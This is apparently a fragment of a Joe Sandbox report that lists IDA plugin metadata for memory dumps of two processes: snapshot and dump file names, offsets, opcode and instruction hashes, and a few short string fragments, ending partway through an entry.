                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 64c5c841c55421cd63636ed617b7774ae5966390cd8163725da3f6074ad95fa3
                  • Instruction ID: 052f03a2faaf1afede4777ca9cb33826ced49c55b963990d3835bcad29c9a5f1
                  • Opcode Fuzzy Hash: 64c5c841c55421cd63636ed617b7774ae5966390cd8163725da3f6074ad95fa3
                  • Instruction Fuzzy Hash: C5B01200F0E30B43F13402F0087023C04400B45A40F520531D50B451F3DCCC3A001354
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID: "$#$&$)$+$[$}
                  • API String ID: 0-4069700903
                  • Opcode ID: af9eee0662d6b420f4f0a570dadbc16d8d91892d1700734ea4982e5023066517
                  • Instruction ID: 553d3572f21b32a316ae59450cea28a1915738e9079c181c12a5d7a778d5b92d
                  • Opcode Fuzzy Hash: af9eee0662d6b420f4f0a570dadbc16d8d91892d1700734ea4982e5023066517
                  • Instruction Fuzzy Hash: ACA1E570E0966D8EEBA8DF94C8A47EDB7B1BF54300F5140BAD04DA7291DBB85A84DF00
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID: mK_^$nK_^$oK_^$pK_^
                  • API String ID: 0-518264926
                  • Opcode ID: 7ebf81088440f1df9f170bc64a5bfd84a173096d4bb886d109d958cc882b9781
                  • Instruction ID: 8c3ed47a136efc984eab0fec45f30e555a57b3ed8401f2c51f20eda91e268987
                  • Opcode Fuzzy Hash: 7ebf81088440f1df9f170bc64a5bfd84a173096d4bb886d109d958cc882b9781
                  • Instruction Fuzzy Hash: BDD17313B0F5A71BE716B76CA8F59E63FD0DF0222870A42F7E49D490E3DC0A694D8295
                  Strings
                  Memory Dump Source
                  • Source File: 00000017.00000002.1842555389.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_23_2_7ffd9ba00000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID: M_H
                  • API String ID: 0-372873180
                  • Opcode ID: 3e26a509ffc441c7397234ee71599ecc61001c5f49f1ebcb3b4ae3b4dbabba02
                  • Instruction ID: 144ce2f9288ddf293b70d760b6d8df84bc6e7ce1db85e309154f701f32ca8cfc
                  • Opcode Fuzzy Hash: 3e26a509ffc441c7397234ee71599ecc61001c5f49f1ebcb3b4ae3b4dbabba02
                  • Instruction Fuzzy Hash: 9391C171A1994E8FEB54DB68C8657AC7BE1EF9A310F5102FAD04DD72DACBB428058B40
                  Strings
                  Memory Dump Source
                  • Source File: 00000017.00000002.1842555389.00007FFD9BA0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA0A000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_23_2_7ffd9ba0a000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID: >$N$c
                  • API String ID: 0-2822027293
                  • Opcode ID: dee926cbde86f8d9928a42991ba40dd94f260414554b9950dc9d5161046f7e05
                  • Instruction ID: 4e9ad34a771aff76b65910e1ea28bbfdc1b26f5af40d32daa956d80f8c863e5d
                  • Opcode Fuzzy Hash: dee926cbde86f8d9928a42991ba40dd94f260414554b9950dc9d5161046f7e05
                  • Instruction Fuzzy Hash: 9D5124B1E0562D8BDBA8DF18C8947A8B7B1FF59301F0041FAE14DE32A1DA746E818F41
                  Strings
                  Memory Dump Source
                  • Source File: 00000017.00000002.1842555389.00007FFD9BA11000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA11000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_23_2_7ffd9ba11000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID: '$/
                  • API String ID: 0-2558154120
                  • Opcode ID: 8ee8baa632278cfb3e8b985c63f81ae3cdb059dd99bd97111358686d03bcceed
                  • Instruction ID: 414f2814d692274a92245a53f5c52e02d8a665ac54643b46c4497af0d1c8144d
                  • Opcode Fuzzy Hash: 8ee8baa632278cfb3e8b985c63f81ae3cdb059dd99bd97111358686d03bcceed
                  • Instruction Fuzzy Hash: 5121DA70D0922E8FEBB4DF94C8907FDB7B0AB14301F1154BAD41DA7695DA786A84DF40
                  Strings
                  Memory Dump Source
                  • Source File: 00000017.00000002.1842555389.00007FFD9BA11000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA11000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_23_2_7ffd9ba11000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID: U
                  • API String ID: 0-3372436214
                  • Opcode ID: ad13a3b8ab09455ecedaf20a99897870a1881c16793e9c05113dd894c308017e
                  • Instruction ID: c26935e1a9c27d7da1440e336aeb23ea9437a5a816c3003bb8072b98d7d7391e
                  • Opcode Fuzzy Hash: ad13a3b8ab09455ecedaf20a99897870a1881c16793e9c05113dd894c308017e
                  • Instruction Fuzzy Hash: 1111C470A1950E8FE791EBB8C8586EA7BF0FF19305F0118B6D428C30A5DA78A6408B50
                  Strings
                  Memory Dump Source
                  • Source File: 00000017.00000002.1842555389.00007FFD9BA0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA0A000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_23_2_7ffd9ba0a000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID: O
                  • API String ID: 0-878818188
                  • Opcode ID: 26991cf8452ccacfe0d90af19eb0937e8cb1b313dabb00877a0059d338a664d8
                  • Instruction ID: 431554eadea0b3f640baf5deb716694e9b79763452558f75cc928dbc37922be6
                  • Opcode Fuzzy Hash: 26991cf8452ccacfe0d90af19eb0937e8cb1b313dabb00877a0059d338a664d8
                  • Instruction Fuzzy Hash: 23D092B0E0961D8EDBA0DF28C8557AC76F0BF28304F0000B5958CD2291CB746A819F08
                  Memory Dump Source
                  • Source File: 00000017.00000002.1842555389.00007FFD9BA11000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA11000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_23_2_7ffd9ba11000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: a80f9a74e09d36195121496980b43895bcc4f5a8ec72cb613ab03973f662efe6
                  • Instruction ID: 09ea011a54ce255963a4edca42040fafeb57a933f36b883e0072958de1838ebb
                  • Opcode Fuzzy Hash: a80f9a74e09d36195121496980b43895bcc4f5a8ec72cb613ab03973f662efe6
                  • Instruction Fuzzy Hash: D411B620A0E68D5FE753EF7888745A97FF0EF16300F0A05F7D499C71A7DA64A6048752
                  Memory Dump Source
                  • Source File: 00000017.00000002.1842555389.00007FFD9BA0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA0A000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_23_2_7ffd9ba0a000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: d0b81a5e8837e639f2a9ccdd07ad2fdfde98709fd819afeb6bbeb86e8b9778af
                  • Instruction ID: a7d50a3d729bfd962f70b3f1b2b8280e09716e0d19ab4fdfb68ee3fe929f65aa
                  • Opcode Fuzzy Hash: d0b81a5e8837e639f2a9ccdd07ad2fdfde98709fd819afeb6bbeb86e8b9778af
                  • Instruction Fuzzy Hash: 78E16D71E1964D8FEBA8EB68C4A47B8B7A1FF59301F0101BED44ED32E6CA756944CB40
                  Memory Dump Source
                  • Source File: 00000017.00000002.1842555389.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_23_2_7ffd9ba00000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: e7e647d93361e04eb72429d1414635657f1313ed478db642e00ac43488b3d428
                  • Instruction ID: fe9080c16e0a1ae09953ba54ec67e4221a827042c6475637a7a1cca94b32688f
                  • Opcode Fuzzy Hash: e7e647d93361e04eb72429d1414635657f1313ed478db642e00ac43488b3d428
                  • Instruction Fuzzy Hash: 5191E031B0DA4D4BDB58DF5C88606B977E2EFAA300F15417AE48DC3292DE30AD06C780
                  Memory Dump Source
                  • Source File: 00000017.00000002.1842555389.00007FFD9BA0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA0A000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_23_2_7ffd9ba0a000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 5cd04cc20b734108dc7e6cf0620c9309b4a98decd76b31dbcc04656a815946d8
                  • Instruction ID: f82a67c0c22fb42639d302954af520feee62b4b1a1dbf0aa5e7fed9a82fefa8a
                  • Opcode Fuzzy Hash: 5cd04cc20b734108dc7e6cf0620c9309b4a98decd76b31dbcc04656a815946d8
                  • Instruction Fuzzy Hash: 7E512923B0D12B4AF316B7ACB4618FD7790DF42334F0A02B7D59E890E7ED1E25898294
                  Memory Dump Source
                  • Source File: 00000017.00000002.1842555389.00007FFD9BA11000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA11000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_23_2_7ffd9ba11000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: e04037ae2fd79ce608848f9873c3bd8f18a65a215f5d752bf0a62b53b65e6084
                  • Instruction ID: 1802dfb615021de0062611af4216ebbe4e24053ef5563e5b2bf9bbc969d56a79
                  • Opcode Fuzzy Hash: e04037ae2fd79ce608848f9873c3bd8f18a65a215f5d752bf0a62b53b65e6084
                  • Instruction Fuzzy Hash: 0D518C2770A96E1AE750BB6CFC648F9BBD0EF91373B0507B3D148CA092DE21650D87A1
                  Memory Dump Source
                  • Source File: 00000017.00000002.1842555389.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_23_2_7ffd9ba00000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 6c6f3b8a57e3fd8c75c25dcf03778dfe5cdd06d86b05c779b09d89df1d2f7882
                  • Instruction ID: 318a6cd389d2e86e73fe56092dd835dc920b7e4002da21a43b9d6fdbb2bed6bc
                  • Opcode Fuzzy Hash: 6c6f3b8a57e3fd8c75c25dcf03778dfe5cdd06d86b05c779b09d89df1d2f7882
                  • Instruction Fuzzy Hash: C451CF31B18A4D4FDB58DF4888645BA73E2FFEA304F15457EE49AC3296DE34E9028780
                  Memory Dump Source
                  • Source File: 00000017.00000002.1842555389.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_23_2_7ffd9ba00000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: f9cdb13562eca5aa2999d3de2725538c422f58ef3540b1a14ca9dafd216bec75
                  • Instruction ID: 147724c9544a966694057575670e662cebb1a51b0ae0579c78d0997abe47ba6d
                  • Opcode Fuzzy Hash: f9cdb13562eca5aa2999d3de2725538c422f58ef3540b1a14ca9dafd216bec75
                  • Instruction Fuzzy Hash: DA516B70E0961E8FEB64DBA8C4A46EDBBF1FF59301F51403AD049E72A5DB786A44CB10
                  Memory Dump Source
                  • Source File: 00000017.00000002.1842555389.00007FFD9BA0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA0A000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_23_2_7ffd9ba0a000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 902b0f91d2495cfcbe1c774362b6bab6f1322b96c558590c56b9951464fd2faa
                  • Instruction ID: 96cc10868bd6f36931361f4684577a9426c23c796ba54cbe392d62f46fa6548d
                  • Opcode Fuzzy Hash: 902b0f91d2495cfcbe1c774362b6bab6f1322b96c558590c56b9951464fd2faa
                  • Instruction Fuzzy Hash: 2A514D70E0951D8FEBA4EBA8C4657EDB7F1FF5A300F11417AD04DE32A2DA7869418B41
                  Memory Dump Source
                  • Source File: 00000017.00000002.1842555389.00007FFD9BA0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA0A000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_23_2_7ffd9ba0a000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: a8ea60cbc07f54c5431eb82b1f03db85f6b91e0b13bef85bc5606a312a0dbe4e
                  • Instruction ID: 0c3c88c700cb57913aedf89ad6e2e800ab38024f5a50b55343b5b2b0801f7d73
                  • Opcode Fuzzy Hash: a8ea60cbc07f54c5431eb82b1f03db85f6b91e0b13bef85bc5606a312a0dbe4e
                  • Instruction Fuzzy Hash: B1414962F0E54E5FE721EBA888A95F977E0FF16300F4504B3D0A8C70A2EE64A504C341
                  Memory Dump Source
                  • Source File: 00000017.00000002.1842555389.00007FFD9BA11000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA11000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_23_2_7ffd9ba11000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: a6881e27ff4fafed3aeaf4eab9a181933e45bf1311acf8115fa5718002c051c9
                  • Instruction ID: b56fcd27df4cc2fdd1f2bc17116b5bbfdc03571e4e8f190e2f09428a343a222d
                  • Opcode Fuzzy Hash: a6881e27ff4fafed3aeaf4eab9a181933e45bf1311acf8115fa5718002c051c9
                  • Instruction Fuzzy Hash: C251FC70E1561D8EEBA4EF98C8A5BACB7B1FF18300F1141B9D40DE3292DE746A858F40
                  Memory Dump Source
                  • Source File: 00000017.00000002.1842555389.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_23_2_7ffd9ba00000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 033554c8f21d18d56c0c8a1fa916798406954bfdd08130a383b79410ad84280c
                  • Instruction ID: 5ca5eb8350f6d6f3f0c99bcdf44c5809c32755d9e9a993ce63dfd69374b22f1a
                  • Opcode Fuzzy Hash: 033554c8f21d18d56c0c8a1fa916798406954bfdd08130a383b79410ad84280c
                  • Instruction Fuzzy Hash: 27411731B0E78E4FE765D7B888655B87BE0EF8B300F0641BBD48DC71A6DE68A9418341
                  Memory Dump Source
                  • Source File: 00000017.00000002.1842555389.00007FFD9BA0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA0A000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_23_2_7ffd9ba0a000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 28ef9c41e6a2b0c9c0751f9865f8e4a69d784fe204d37cfef507ba03b4e47b4a
                  • Instruction ID: 485e1a68d9e65e5d0c9a6f864bac605dac9f725de053548db5b6e6f12aef0882
                  • Opcode Fuzzy Hash: 28ef9c41e6a2b0c9c0751f9865f8e4a69d784fe204d37cfef507ba03b4e47b4a
                  • Instruction Fuzzy Hash: 05512A70E0A21D8FDB64DFA4D5A46ED77F1EF19300F51007AE049E72A2DBB8AA44CB50
                  Memory Dump Source
                  • Source File: 00000017.00000002.1842555389.00007FFD9BA11000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA11000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_23_2_7ffd9ba11000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 9873ce62cc964d9500f8ed0136eb4cc26f667cd3e751e9d0525c0d017e71dfca
                  • Instruction ID: 187529c4a3d86a8d024fb7293b760c53e54894c8421c9d939bfd8dc51151e20d
                  • Opcode Fuzzy Hash: 9873ce62cc964d9500f8ed0136eb4cc26f667cd3e751e9d0525c0d017e71dfca
                  • Instruction Fuzzy Hash: 7E416A30E0961D8FEBA8EBA8C8657A976B1FF55300F1151BAC41DD22A1DF786A84CB01
                  Memory Dump Source
                  • Source File: 00000017.00000002.1842555389.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_23_2_7ffd9ba00000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 095ae2e9ed8cc25595a5cd1fe2a9a770e900537e83041c36dc65f837d9972584
                  • Instruction ID: de0849ed64f7c3ec3a756ca3c69624e22c7387c3fc842fb376eb4a404085cda5
                  • Opcode Fuzzy Hash: 095ae2e9ed8cc25595a5cd1fe2a9a770e900537e83041c36dc65f837d9972584
                  • Instruction Fuzzy Hash: 77511130E0A72D8EEB75DB91C8647F9B6B4BF16300F4141B9D08D961A2DEB86A848F54
                  Memory Dump Source
                  • Source File: 00000017.00000002.1842555389.00007FFD9BA0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA0A000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_23_2_7ffd9ba0a000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: fc37abe689bf00bcd894afa54684e23d79e25d5ec08bbceea0c75a1a1b4b822f
                  • Instruction ID: 8f8ae10afe61f12354c2248a3602553d3fd3729cc92c3f7f939539a99a097b4d
                  • Opcode Fuzzy Hash: fc37abe689bf00bcd894afa54684e23d79e25d5ec08bbceea0c75a1a1b4b822f
                  • Instruction Fuzzy Hash: 2F41E726B0E11B4AF726B7ACB4614FD7790EF42330F0602B7D59EC50D3ED6D25894290
                  Memory Dump Source
                  • Source File: 00000017.00000002.1842555389.00007FFD9BA0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA0A000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_23_2_7ffd9ba0a000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 92886d8f30a749b513ed4f8ea8611dabe6adde8cdffb5d7321eb0712eae90563
                  • Instruction ID: d6dc8fa9719bcd2b296560ddf7552ff226d00c4f5f45fdd01388906305250c0f
                  • Opcode Fuzzy Hash: 92886d8f30a749b513ed4f8ea8611dabe6adde8cdffb5d7321eb0712eae90563
                  • Instruction Fuzzy Hash: 77310770E0981D8FEBA4EBA894A57ECB7B1FF59300F511079D04DE3292DE6869428B40
                  Memory Dump Source
                  • Source File: 00000017.00000002.1842555389.00007FFD9BA0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA0A000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_23_2_7ffd9ba0a000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: fe784aecbe128cdeb1804f97e07dcfccfce45062d8deec7f05858ba11653bb25
                  • Instruction ID: 4f92c2086f2c1e5d12413daf50403acc071d01c45dc5257347634f58750946bb
                  • Opcode Fuzzy Hash: fe784aecbe128cdeb1804f97e07dcfccfce45062d8deec7f05858ba11653bb25
                  • Instruction Fuzzy Hash: 7D310A70E1991D8FEBA4EB9884A57FCB7B1FF5A300F511039D04DE3292DE7869418B40
                  Memory Dump Source
                  • Source File: 00000017.00000002.1842555389.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_23_2_7ffd9ba00000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 142dda6c1df69d1a29283d9fd92ccf47791cc6bf377c335957a9edee1096067d
                  • Instruction ID: e7b9d11c31cda95313fd80ff8ba3eb424d4d97dcb37570bc71000f07fe21cf7e
                  • Opcode Fuzzy Hash: 142dda6c1df69d1a29283d9fd92ccf47791cc6bf377c335957a9edee1096067d
                  • Instruction Fuzzy Hash: 53215762B0E54F5BE721B7B888795E97BE0FF12314F0A44B7D49DCB0A7DE24A548C284
                  Memory Dump Source
                  • Source File: 00000017.00000002.1842555389.00007FFD9BA11000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA11000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_23_2_7ffd9ba11000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 756c4cb67fc8b1f0a67e8cd009405ef980d32e70d92f9463066633ce48c693f9
                  • Instruction ID: dbb44ba086274d33151287d6dc364534af827fa0fc8f44012e4ea42debfd51e7
                  • Opcode Fuzzy Hash: 756c4cb67fc8b1f0a67e8cd009405ef980d32e70d92f9463066633ce48c693f9
                  • Instruction Fuzzy Hash: 6B31AF30A0A60E9FDBA8EF68C4656BE77A1FF58304F1505BED41DC31A5CE75A644C780
                  Memory Dump Source
                  • Source File: 00000017.00000002.1842555389.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_23_2_7ffd9ba00000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 423283e3507a5240ed8c471b7b7422930023403f939ae32f022d3fe81eb37512
                  • Instruction ID: cfca332b9b082cbafa5d50cb182dd49f1be0de1e5678034814aa5bf432a14cb9
                  • Opcode Fuzzy Hash: 423283e3507a5240ed8c471b7b7422930023403f939ae32f022d3fe81eb37512
                  • Instruction Fuzzy Hash: 6F218B52B0E18B57E72137BC98791E97B90FF02314F0A40B3D4D9CA093DE14A159C2C4
                  Memory Dump Source
                  • Source File: 00000017.00000002.1842555389.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_23_2_7ffd9ba00000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b2bed0fda99345f953e9a769a8021293a8802debb99df35d682dd7b640641de5
                  • Instruction ID: 19b955b6f29ed2db3a4a2425bad738e858bd8d749f90eb83fa8edc18f21ff7dd
                  • Opcode Fuzzy Hash: b2bed0fda99345f953e9a769a8021293a8802debb99df35d682dd7b640641de5
                  • Instruction Fuzzy Hash: 48212A30A0A64E8FDB58EFA4C4696BE77E0FF19304F1108BED45AD72A1DA75A6408B40
                  Memory Dump Source
                  • Source File: 00000017.00000002.1842555389.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_23_2_7ffd9ba00000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 76143ae0446e94c14657ff5e5fe2b89744780814a1fcd47242e8f923215fb8b5
                  • Instruction ID: 61d824abd2401056167c8742d79a2b0999fd3553483846a15d4f0ddfeec0edf1
                  • Opcode Fuzzy Hash: 76143ae0446e94c14657ff5e5fe2b89744780814a1fcd47242e8f923215fb8b5
                  • Instruction Fuzzy Hash: 03215C30A0A60E8FEB55EB68C8685BE77F0FF19300F0549BAD45AD71A5DB74E6408B40
                  Memory Dump Source
                  • Source File: 00000017.00000002.1842555389.00007FFD9BA11000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA11000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_23_2_7ffd9ba11000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: cf3dc24ce28ca0c19f4293b168480957b4de587da3f1142cbb2957e10b639876
                  • Instruction ID: b66cec593dfb4962b05e31a93ceb1fe889a96f07b5d14eb38da314deda3f7d94
                  • Opcode Fuzzy Hash: cf3dc24ce28ca0c19f4293b168480957b4de587da3f1142cbb2957e10b639876
                  • Instruction Fuzzy Hash: 5C21AC2094E2CA4FDB579BB488B65E53FB0AF07314B0A04EED49AC60A3D96DA156C312
                  Memory Dump Source
                  • Source File: 00000017.00000002.1842555389.00007FFD9BA0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA0A000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_23_2_7ffd9ba0a000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: de2702cfcbaefd4cc7b3c7ca41de5c8b65a327d3e0e9b6aec95b2e63d322ab29
                  • Instruction ID: f3e5564bcb736d3466d07529e97610675c089de964e961d0402ed79ec1c74736
                  • Opcode Fuzzy Hash: de2702cfcbaefd4cc7b3c7ca41de5c8b65a327d3e0e9b6aec95b2e63d322ab29
                  • Instruction Fuzzy Hash: 6F218E30A0864D8FDB85EF68C895AAD3BF0FF2D305F01456AE849C72A5DB70E540CB80
                  Memory Dump Source
                  • Source File: 00000017.00000002.1842555389.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_23_2_7ffd9ba00000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 5ce9faed70555e81db79b74ffde4884720b415dc85cbfbe46c3512e455d825ae
                  • Instruction ID: 91ebefcfa364a075a85b4b30347b71d8580e3c9f97f3be549dc5849811f4e0f7
                  • Opcode Fuzzy Hash: 5ce9faed70555e81db79b74ffde4884720b415dc85cbfbe46c3512e455d825ae
                  • Instruction Fuzzy Hash: 4F21AF3094E68A8FD752EBB488685A97FF0EF0B310F1905F6D099DB0B2DA78A545C711
                  Memory Dump Source
                  • Source File: 00000017.00000002.1842555389.00007FFD9BA11000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA11000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_23_2_7ffd9ba11000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 636d4101f5767fbfcf9ab9383910e362df63ec5d312c7a1349a08112f80a5fbd
                  • Instruction ID: 21ba6ae45a3c5b7538306511e4a2ab66a110536478a4a0eebd5427b9fb224efe
                  • Opcode Fuzzy Hash: 636d4101f5767fbfcf9ab9383910e362df63ec5d312c7a1349a08112f80a5fbd
                  • Instruction Fuzzy Hash: C311B130A0A64E8FDBA8EF68C4696BD3BE1FF18301F0505BED41DC71A2DA75A554C780
                  Memory Dump Source
                  • Source File: 00000017.00000002.1842555389.00007FFD9BA11000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA11000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_23_2_7ffd9ba11000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 21bd26a472314296a8321e3939be64aa98aa0022f5d29f905c538948930cb32b
                  • Instruction ID: 606a18275a5d67ba4ac6437dafb5f4787c8401316c50d5290dcbe63b0794c333
                  • Opcode Fuzzy Hash: 21bd26a472314296a8321e3939be64aa98aa0022f5d29f905c538948930cb32b
                  • Instruction Fuzzy Hash: D111AF30A1974D8FDB98EF54C8A55E93BE1FF58308F06117EE45AC31A5CA74E550CB81
                  Memory Dump Source
                  • Source File: 00000017.00000002.1842555389.00007FFD9BA11000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA11000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_23_2_7ffd9ba11000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 3279aa0f38dd38f6494235b184788f06fbdaff901f0db2be0932dec5d0c332c1
